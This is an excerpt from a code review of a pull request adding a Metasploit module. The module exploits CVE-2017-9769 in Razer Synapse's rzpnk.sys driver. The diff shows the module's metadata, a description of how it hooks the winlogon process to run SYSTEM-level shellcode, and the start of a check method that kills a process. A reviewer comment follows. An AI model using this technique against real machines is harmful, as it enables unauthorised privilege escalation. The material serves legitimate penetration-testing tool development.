modules/exploits/windows/local/razer_zwopenprocess.rb

```diff
@@ -0,0 +1,253 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/local/windows_kernel'
+require 'rex'
+require 'metasm'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Local::WindowsKernel
+  include Msf::Post::Windows::Priv
+
+  # the max size our hook can be, used before it's generated for the allocation
+  HOOK_STUB_MAX_LENGTH = 256
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Razer Synapse rzpnk.sys ZwOpenProcess',
+      'Description'    => %q{
+        A vulnerability exists in the latest version of Razer Synapse
+        (v2.20.15.1104 as of the day of disclosure) which can be leveraged
+        locally by a malicious application to elevate its privileges to those of
+        NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
+        in the rzpnk.sys driver that passes a PID specified by the user to
+        ZwOpenProcess. This can be issued by an application to open a handle to
+        an arbitrary process with the necessary privileges to allocate, read and
+        write memory in the specified process.
+
+        This exploit leverages this vulnerability to open a handle to the
+        winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
+        installing a hook to execute attacker controlled shellcode. This hook is
+        then triggered on demand by calling user32!LockWorkStation(), resulting
+        in the attacker's payload being executed with the privileges of the
+        infected winlogon process. In order for the issued IOCTL to work, the
+        RazerIngameEngine.exe process must not be running. This exploit will
+        check if it is, and attempt to kill it as necessary.
+
+        The vulnerable software can be found here:
+        https://www.razerzone.com/synapse/. No Razer hardware needs to be
+        connected in order to leverage this vulnerability.
+
+        This exploit is not opsec-safe due to the user being logged out as part
+        of the exploitation process.
+      },
+      'Author'         => 'Spencer McIntyre',
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', '2017-9769'],
+        ['URL', 'https://warroom.securestate.com/cve-2017-9769/']
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # Tested on (64 bits):
+          # * Windows 7 SP1
+          # * Windows 10.0.10586
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC'   => 'thread',
+          'WfsDelay'   => 20
+        },
+      'DefaultTarget'  => 0,
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 22 2017'))
+  end
+
+  def check
+    pid = session.sys.process['RazerIngameEngine.exe']
+    session.sys.process.kill(pid) unless pid.nil?
```

Comment:
Ah I see, my bad. `get_handle` is called in the `check` method. Sorry about that.

I'm still keen to see if we can find a way of checking without the side effect though. Can we say, realistically, that if the driver is running and has the same hash/version as what's expected, then you don't need to `get_handle` in the check?

Thanks for working through my derp here @zeroSteiner :)